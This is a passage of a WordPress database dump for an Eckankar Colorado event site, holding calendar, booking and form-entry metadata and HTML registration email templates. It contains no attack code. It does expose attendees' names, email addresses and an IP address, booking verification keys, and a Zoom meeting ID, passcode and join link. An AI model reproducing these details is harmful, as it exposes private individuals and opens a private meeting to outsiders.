";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-08-19\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(167283,266990,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(167284,266990,'mec_certain_weekdays','a:0:{}'),(167285,266990,'mec_allday','0'),(167286,266990,'mec_hide_time','0'),(167287,266990,'mec_hide_end_time','0'),(167288,266990,'mec_comment',''),(167289,266990,'mec_repeat_status','0'),(167290,266990,'mec_repeat_type',''),(167291,266990,'mec_repeat_interval','1'),(167292,266990,'mec_repeat_end',''),(167293,266990,'mec_repeat_end_at_occurrences',''),(167294,266990,'mec_repeat_end_at_date',''),(167295,266990,'mec_advanced_days','a:0:{}'),(167296,266990,'mec_in_days',''),(167297,266990,'mec_not_in_days',''),(167298,266990,'mec_hourly_schedules','a:0:{}'),(167299,266990,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(167300,266990,'mec_tickets','a:0:{}'),(167301,266990,'mec_fees_global_inheritance','1'),(167302,266990,'mec_fees','a:0:{}'),(167303,266990,'mec_ticket_variations_global_inheritance','1'),(167304,266990,'mec_ticket_variations','a:0:{}'),(167305,266990,'mec_reg_fields_global_inheritance','1'),(167306,266990,'mec_reg_fields','a:0:{}'),(167307,266990,'mec_op','a:0:{}'),(167308,266990,'mec_event_date_submit','20210422105713'),(167309,266990,'mec_read_more',''),(167310,266990,'mec_more_info',''),(167311,266990,'mec_more_info_title',''),(167312,266990,'mec_more_info_target','_self'),(167313,266990,'mec_cost',''),(167314,266990,'mec_currency','a:0:{}'),(167315,266990,'mec_additional_organizer_ids','a:0:{}'),(167316,266990,'mec_additional_location_ids','a:0:{}'),(167317,266990,'one_occurrence','0'),(167318,266990,'mec_timezone','global'),(167319,266990,'mec_countdown_method','global'),(167320,266990,'mec_public','1'),(167321,266990,'mec_bfixed_fields','a:0:{}'),(167322,266990,'mec_fields','a:0:{}'),(167323,266990,'mec_event_status','EventScheduled'),(167324,266990,'mec_moved_online_link',''),(167325,266990,'mec_cancelled_reason',''),(167326,266990,'mec_display_cancellation_reason_in_single_page',''),(167327,266990,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(167328,266990,'passster_activate_global_protection',NULL),(167329,266990,'passster_activate_protection',NULL),(167330,266990,'passster_protection_type','password'),(167331,266990,'_wp_old_date','2022-01-18'),(167332,266990,'boldgrid_in_page_containers','1'),(167333,266990,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(167336,266990,'_dp_original','266988'),(167335,266990,'_thumbnail_id','266818'),(167337,266990,'_edit_lock','1660675813:2'),(167338,266990,'_edit_last','2'),(167339,266991,'_field_224','Behrouz'),(167340,266991,'_field_225','Sohrabi'),(167341,266991,'_field_226','sohrabi.beh@gmail.com'),(167342,266991,'_field_227','CO'),(167343,266991,'_field_228','US'),(167344,266991,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(167345,266991,'_form_id','21'),(167346,266991,'_seq_num','154'),(167347,266992,'mec_transaction_id','GUZ25189'),(167348,266992,'mec_user_id','1000036'),(167349,266992,'mec_verified','1'),(167350,266992,'mec_verification_key','92188ff1818d14680767e134a7b41b79'),(167351,266992,'mec_cancellation_key','7dc7e9c11d0c5611399f267fb79f578b'),(167352,266992,'mec_confirmed','1'),(167353,266992,'mec_event_id','266604'),(167354,266992,'mec_date','1663501500:1663506000'),(167355,266992,'mec_ticket_id',',1,'),(167356,266992,'mec_booking_time','2022-07-31 16:37:34'),(167357,266992,'mec_all_dates','a:0:{}'),(167358,266992,'mec_other_dates','a:0:{}'),(167359,266992,'mec_attention_time','1663501500:1663506000'),(167360,266992,'mec_attention_time_start','1663501500'),(167361,266992,'mec_attention_time_end','1663506000'),(167362,266992,'mec_book_date_submit','20220731163734'),(167363,266992,'mec_booking_location','118'),(167364,266992,'mec_ticket_price_1','0'),(167365,266992,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"47.12.99.86\";}}'),(167366,266992,'mec_price','0'),(167367,266992,'mec_gateway','MEC_gateway_free'),(167368,266992,'mec_gateway_label','Free'),(167369,266994,'protect_children',''),(167370,266994,'mec_color',''),(167371,266994,'mec_location_id','118'),(167372,266994,'mec_dont_show_map','0'),(167373,266994,'mec_organizer_id','1'),(167374,266994,'mec_read_more',''),(167375,266994,'mec_more_info',''),(167376,266994,'mec_more_info_title',''),(167377,266994,'mec_more_info_target','_self'),(167378,266994,'mec_cost',''),(167379,266994,'mec_currency','a:0:{}'),(167380,266994,'mec_additional_organizer_ids','a:0:{}'),(167381,266994,'mec_additional_location_ids','a:0:{}'),(167382,266994,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-08-16\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-08-16\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(167383,266994,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(167384,266994,'mec_certain_weekdays','a:0:{}'),(167385,266994,'mec_allday','0'),(167386,266994,'one_occurrence','0'),(167387,266994,'mec_hide_time','0'),(167388,266994,'mec_hide_end_time','0'),(167389,266994,'mec_comment',''),(167390,266994,'mec_timezone','global'),(167391,266994,'mec_countdown_method','global'),(167392,266994,'mec_public','1'),(167393,266994,'mec_start_date','2022-08-16'),(167394,266994,'mec_start_time_hour','7'),(167395,266994,'mec_start_time_minutes','0'),(167396,266994,'mec_start_time_ampm','PM'),(167397,266994,'mec_start_day_seconds','68400'),(167398,266994,'mec_end_date','2022-08-16'),(167399,266994,'mec_end_time_hour','8'),(167400,266994,'mec_end_time_minutes','0'),(167401,266994,'mec_end_time_ampm','PM'),(167402,266994,'mec_end_day_seconds','72000'),(167403,266994,'mec_repeat_status','0'),(167404,266994,'mec_repeat_type',''),(167405,266994,'mec_repeat_interval','1'),(167406,266994,'mec_repeat_end',''),(167407,266994,'mec_repeat_end_at_occurrences',''),(167408,266994,'mec_repeat_end_at_date',''),(167409,266994,'mec_advanced_days','a:0:{}'),(167410,266994,'mec_in_days',''),(167411,266994,'mec_not_in_days',''),(167412,266994,'mec_hourly_schedules','a:0:{}'),(167413,266994,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(167414,266994,'mec_tickets','a:0:{}'),(167415,266994,'mec_fees_global_inheritance','1'),(167416,266994,'mec_fees','a:0:{}'),(167417,266994,'mec_ticket_variations_global_inheritance','1'),(167418,266994,'mec_ticket_variations','a:0:{}'),(167419,266994,'mec_reg_fields_global_inheritance','1'),(167420,266994,'mec_reg_fields','a:0:{}'),(167421,266994,'mec_bfixed_fields','a:0:{}'),(167422,266994,'mec_op','a:0:{}'),(167423,266994,'mec_fields','a:0:{}'),(167424,266994,'mec_event_status','EventScheduled'),(167425,266994,'mec_moved_online_link',''),(167426,266994,'mec_cancelled_reason',''),(167427,266994,'mec_display_cancellation_reason_in_single_page',''),(167428,266994,'boldgrid_hide_page_title','0'),(167429,266994,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(167430,266994,'passster_activate_global_protection',NULL),(167431,266994,'passster_activate_protection',NULL),(167432,266994,'passster_protection_type','password'),(167435,266994,'_dp_original','266104'),(167434,266994,'boldgrid_in_page_containers','1'),(167436,266994,'_edit_lock','1659395683:15'),(167437,266994,'_edit_last','15'),(167438,266995,'_wp_attached_file','2022/08/GoldenHeart.webp'),(167439,266995,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:24:\"2022/08/GoldenHeart.webp\";s:8:\"filesize\";i:9450;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"GoldenHeart-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4326;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"GoldenHeart-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2742;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:24:\"GoldenHeart-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5970;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:24:\"GoldenHeart-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8550;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:24:\"GoldenHeart-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6762;}s:8:\"tileview\";a:5:{s:4:\"file\";s:24:\"GoldenHeart-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6660;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(167440,266994,'_thumbnail_id','266995'),(167441,266996,'mec_color',''),(167442,266996,'mec_location_id','129'),(167443,266996,'mec_dont_show_map','0'),(167444,266996,'mec_organizer_id','1'),(167445,266996,'mec_read_more',''),(167446,266996,'mec_more_info',''),(167447,266996,'mec_more_info_title',''),(167448,266996,'mec_more_info_target','_self'),(167449,266996,'mec_cost',''),(167450,266996,'mec_currency','a:0:{}'),(167451,266996,'mec_additional_organizer_ids','a:0:{}'),(167452,266996,'mec_additional_location_ids','a:0:{}'),(167453,266996,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-08-14\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-08-14\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(167454,266996,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(167455,266996,'mec_certain_weekdays','a:0:{}'),(167456,266996,'mec_allday','0'),(167457,266996,'one_occurrence','0'),(167458,266996,'mec_hide_time','0'),(167459,266996,'mec_hide_end_time','0'),(167460,266996,'mec_comment',''),(167461,266996,'mec_timezone','global'),(167462,266996,'mec_countdown_method','global'),(167463,266996,'mec_public','1'),(167464,266996,'mec_start_date','2022-08-14'),(167465,266996,'mec_start_time_hour','10'),(167466,266996,'mec_start_time_minutes','30'),(167467,266996,'mec_start_time_ampm','AM'),(167468,266996,'mec_start_day_seconds','37800'),(167469,266996,'mec_end_date','2022-08-14'),(167470,266996,'mec_end_time_hour','11'),(167471,266996,'mec_end_time_minutes','30'),(167472,266996,'mec_end_time_ampm','AM'),(167473,266996,'mec_end_day_seconds','41400'),(167474,266996,'mec_repeat_status','0'),(167475,266996,'mec_repeat_type',''),(167476,266996,'mec_repeat_interval','1'),(167477,266996,'mec_repeat_end',''),(167478,266996,'mec_repeat_end_at_occurrences',''),(167479,266996,'mec_repeat_end_at_date',''),(167480,266996,'mec_advanced_days','a:0:{}'),(167481,266996,'mec_in_days',''),(167482,266996,'mec_not_in_days',''),(167483,266996,'mec_hourly_schedules','a:0:{}'),(167484,266996,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(167485,266996,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(167486,266996,'mec_fees_global_inheritance','1'),(167487,266996,'mec_fees','a:0:{}'),(167488,266996,'mec_ticket_variations_global_inheritance','1'),(167489,266996,'mec_ticket_variations','a:0:{}'),(167490,266996,'mec_reg_fields_global_inheritance','1'),(167491,266996,'mec_reg_fields','a:0:{}'),(167492,266996,'mec_bfixed_fields','a:0:{}'),(167493,266996,'mec_op','a:0:{}'),(167494,266996,'mec_fields','a:0:{}'),(167495,266996,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div 